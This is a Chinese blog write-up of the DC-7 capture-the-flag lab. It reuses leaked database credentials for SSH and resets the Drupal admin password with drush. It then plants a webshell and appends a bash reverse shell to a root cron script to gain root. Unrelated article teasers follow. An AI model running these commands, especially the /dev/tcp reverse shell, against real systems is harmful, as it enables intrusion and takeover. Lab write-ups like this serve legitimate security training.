目标站点是一个 drupal 站点

有一个版权信息:@DC7USER

找到一个 github仓库:https://github.com/Dc7User/staffdb

<?php
	$servername = "localhost";
	$username = "dc7user";
	$password = "MdR3xOgB7#dW";
	$dbname = "Staff";
	$conn = mysqli_connect($servername, $username, $password, $dbname);
?>

找到一个用户名和密码。尝试登陆一下目标网站

发现没办法登录,试试ssh

登录成功了。

收集一下信息。任务计划,sudo、suid啥的

dc7user@dc-7:~$ find / -perm -4000 2>/dev/null
/bin/su
/bin/ping
/bin/umount
/bin/mount
/usr/sbin/exim4
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/newgrp

发现一个 /usr/sbin/exim4可能有用,因为它有出过提权漏洞。

 /usr/sbin/exim4 --version
Exim version 4.89 #2 built 20-Jul-2019 11:32:35

exploitdb搜一下,发现这个版本没有提权漏洞。

目录下一个 backups目录和一个 mbox文件。

看看mbox文件是什么东西。

发现一个root用户的任务计划,每隔一段时间,会执行一个脚本

Subject: Cron <root@dc-7> /opt/scripts/backups.sh
dc7user@dc-7:~/backups$ ls -al /opt/scripts/backups.sh 
-rwxrwxr-x 1 root www-data 520 Aug 29  2019 /opt/scripts/backups.sh

查看文件权限发现 www-data 用户组用户可以对它进行修改。

查看一下脚本内容:

cat /opt/scripts/backups.sh 
#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz

这应该就是一个定时备份网站的脚本。

这里发现一个特别的命令drush

搜一下是干嘛的,

是dupal提供的一个网站管理的命令。

经过查询,发现 drush命令可以更改dupal后台的用户密码。

尝试一下。

cd /var/www/html/
dc7user@dc-7:/var/www/html$ drush user-password admin --password=123456
Changed password for admin 

登录后台试试。

成功登录。

然后利用php模块 植入webshell

获取到了www用户权限。

修改 /opt/scripts/backups.sh 文件,反弹shell

echo 'bash -i >& /dev/tcp/192.168.106.132/7777 0>&1' >> /opt/scripts/backups.sh

等待计划任务执行。这一步可能需要最多等15分钟

listening on [any] 7777 ...
192.168.106.139: inverse host lookup failed: Unknown host
connect to [192.168.106.132] from (UNKNOWN) [192.168.106.139] 35976
bash: cannot set terminal process group (1285): Inappropriate ioctl for device
bash: no job control in this shell
root@dc-7:/var/www# id
id
uid=0(root) gid=0(root) groups=0(root)
root@dc-7:/var/www# whoami
whoami
root
root@dc-7:/var/www# 

成功获得了root用户shell

Congratulations!!!

Hope you enjoyed DC-7.  Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.

I'm sending out an especially big thanks to:

@4nqr34z
@D4mianWayne
@0xmzfr
@theart42

If you enjoyed this CTF, send me a tweet via @DCAU7.


成功获取了flag。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2119109.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

python如何加速计算密集型任务?

问题描述&#xff1a; 在python中&#xff0c;有一个函数&#xff0c;其功能是进行某种计算&#xff0c;需要传入一些参数&#xff0c;计算完成后传回结果&#xff0c;调用其一次大概要1s的时间&#xff0c;现在需要通过for循环调用其350次&#xff0c;保存每次调用结果&#…

自动化测试面试题(含答案)

1、你会封装自动化测试框架吗&#xff1f; 自动化框架主要的核心框架就是分层PO模式&#xff1a;分别为&#xff1a;基础封装层BasePage&#xff0c;PO页面对象层&#xff0c;TestCase测试用例层。然后再加上日志处理模块&#xff0c;ini配置文件读取模块&#xff0c;unittest…

SprinBoot+Vue校园部门资料管理系统的设计与实现

目录 1 项目介绍2 项目截图3 核心代码3.1 Controller3.2 Service3.3 Dao3.4 application.yml3.5 SpringbootApplication3.5 Vue 4 数据库表设计5 文档参考6 计算机毕设选题推荐7 源码获取 1 项目介绍 博主个人介绍&#xff1a;CSDN认证博客专家&#xff0c;CSDN平台Java领域优质…

高反差保留DetailTransfer测评

inpainting中的生成链路优化. ComfyUI中IC-Light节点的Detail Transfer节点参数测试_iclight detailtransfer-CSDN博客文章浏览阅读1k次,点赞16次,收藏23次。ic-light是一个能重绘画面光影的节点,但是在重绘的过程中,难免会将图像本身的细节进行重绘,尤其是在电商的场景中…

Python自动化测试学习-PO设计模式

PO模式&#xff1a;Page Object&#xff0c;是一种页面对象设计模式&#xff0c;算是一种比较好的设计模式。在该设计模式中&#xff0c;功能类&#xff08;PageObjects&#xff09;所代表的是每个页面之间的逻辑关系。 PO设计模式 一、PO设计模式的优点 PO模式有以下优点&a…

【Python报错已解决】No Python at ‘C:Users…Python Python39python.exe’

&#x1f3ac; 鸽芷咕&#xff1a;个人主页 &#x1f525; 个人专栏: 《C干货基地》《粉丝福利》 ⛺️生活的理想&#xff0c;就是为了理想的生活! 文章目录 前言一、问题描述1.1 报错示例1.2 报错分析1.3 解决思路 二、解决方法2.1 方法一&#xff1a;检查Python安装路径2.2 …

Linux网络编程---传输层

一、重谈端口号 1、在 TCP/IP 协议中 , 用 " 源 IP", " 源端口号 ", " 目的 IP", " 目的端口号 ", " 协议号 " 这样一个五元组来标识一个通信 ( 可以通过netstat -n查看 ); 2、端口号的划分 0 - 1023: 知名端口号 , HTTP…

树莓派通过串口驱动LD3320语音模块

树莓派通过串口驱动LD3320语音模块 文章目录 树莓派通过串口驱动LD3320语音模块一、LD3320语音模块的认知1.1 模块参数&#xff1a;1.2 模块结构介绍&#xff1a;1.3 模块的串口连接&#xff1a;1.4 验货测试方法&#xff1a;1.5 配套程序识别语句修改方法&#xff1a; 二、树莓…

MySQL数据库宕机,启动不起来,教你一招搞定!

作者介绍&#xff1a;老苏&#xff0c;10余年DBA工作运维经验&#xff0c;擅长Oracle、MySQL、PG、Mongodb数据库运维&#xff08;如安装迁移&#xff0c;性能优化、故障应急处理等&#xff09; 公众号&#xff1a;老苏畅谈运维 欢迎关注本人公众号&#xff0c;更多精彩与您分享…

Stream 流式编程

优质博文&#xff1a;IT-BLOG-CN 大家都知道可以将Collection类转化成流Stream进行操作&#xff08;Map并不能创建流&#xff09;&#xff0c;代码变得简约流畅。我们先看下流的几个特点&#xff1a; 1、流并不存储元素。这些元素可能存储在底层的集合中&#xff0c;或者是按需…

信号与槽,QMainWindow中常用类的使用

QMainWindow菜单栏和工具栏 菜单栏&#xff0c;工具栏&#xff0c;状态栏&#xff0c;中心部件&#xff0c;铆接部件&#xff08;浮动窗口&#xff09; 菜单栏 //创建菜单栏QMenuBar *bar menuBar();//指定父组件this->setMenuBar(bar);this->resize(600,400);this-&g…

老师发布月考成绩的必备小程序

随着新学期的到来&#xff0c;教师们面临着诸多挑战&#xff0c;从课程规划到班级管理&#xff0c;再到学生的个别指导&#xff0c;每一项任务都至关重要。是否有工具能够帮助教师们在这些繁忙的事务中找到一丝轻松呢&#xff1f; “易查分”小程序正是为了解决这一问题而设计…

云原生学习交流

欢迎加入技术交流群&#xff0c;与阿里、腾讯、字节、华为等运维大佬面对面交流和互相学习。 请扫码备注 加群&#xff0c;<城市>-<公司/自由职业>-<昵称>&#xff0c;如“加群&#xff0c;广州-阿里-行则”&#xff1a;

基于SpringBoot的教师人事档案管理系统

你好呀&#xff0c;我是计算机学姐码农小野&#xff01;如果有相关需求&#xff0c;可以私信联系我。 开发语言&#xff1a;Java 数据库&#xff1a;MySQL 技术&#xff1a;SpringBootMyBatis 工具&#xff1a;IDEA/Eclipse、Navicat、Maven 系统展示 首页 教师管理 奖惩…

本地服务器部署Text generation并添加code llama实现远程多人协作

文章目录 前言1. 本地部署Text generation Web UI2. 安装CodeLlama大模型3. 实现公网远程使用Code Llama4. 固定Text generation Web UI公网地址 前言 本篇文章介绍如何在本地部署Text generation Web UI并搭建Code Llama大模型运行,并且搭建Code Llama大语言模型&#xff0c;…

关于HashMap的put方法

前言&#xff1a; HashMap的底层是数组加链表的形式实现&#xff0c;是线程不安全的&#xff0c;在jdk1.7之前put都是采用的头插法&#xff0c;但是使用头插法在多线程的环境下是有可能导致死循环&#xff0c;所以在jdk1.8就将put方法改成了尾插法。 1.产生死循环的原因&…

mfc140u.dll错误是什么情况?如何将mfc140u.dll丢失的解决方法详细分析

mfc140u.dll是 Microsoft Foundation Class (MFC) 库的一部分&#xff0c;通常与 Visual Studio 2015 及其后续版本相关联。如果系统中缺少 mfc140u.dll&#xff0c;可能会导致依赖该库的应用程序无法启动&#xff0c;并显示错误消息&#xff0c;如“程序无法启动&#xff0c;因…

AI预测福彩3D采取888=3策略+和值012路或胆码测试9月9日新模型预测第82弹

经过80多期的测试&#xff0c;当然有很多彩友也一直在观察我每天发的预测结果&#xff0c;得到了一个非常有价值的信息&#xff0c;那就是9码定位的命中率非常高&#xff0c;70多期一共只错了8次&#xff0c;这给喜欢打私房菜的朋友提供了极高价值的预测结果~当然了&#xff0c…

CCF推荐A类会议和期刊总结(计算机网络领域)- 2022

CCF推荐A类会议和期刊总结&#xff08;计算机网络领域&#xff09;- 2022 在中国计算机学会&#xff08;CCF&#xff09;的推荐体系中&#xff0c;A类会议和期刊代表着计算机网络领域的顶尖水平。这些会议和期刊不仅汇集了全球顶尖的研究成果&#xff0c;还引领着该领域的前沿发…

梨花声音研修院退费普通话学习对国际交流的影响

随着中国在国际舞台上的影响力不断增强&#xff0c;普通话在国际交流中的作用日益显著。普通话不仅是中国的国家通用语言&#xff0c;也是全球范围内越来越重要的一种交流工具。通过学习普通话&#xff0c;不仅可以促进国际合作、增强留学和旅游体验&#xff0c;还能拓展全球就…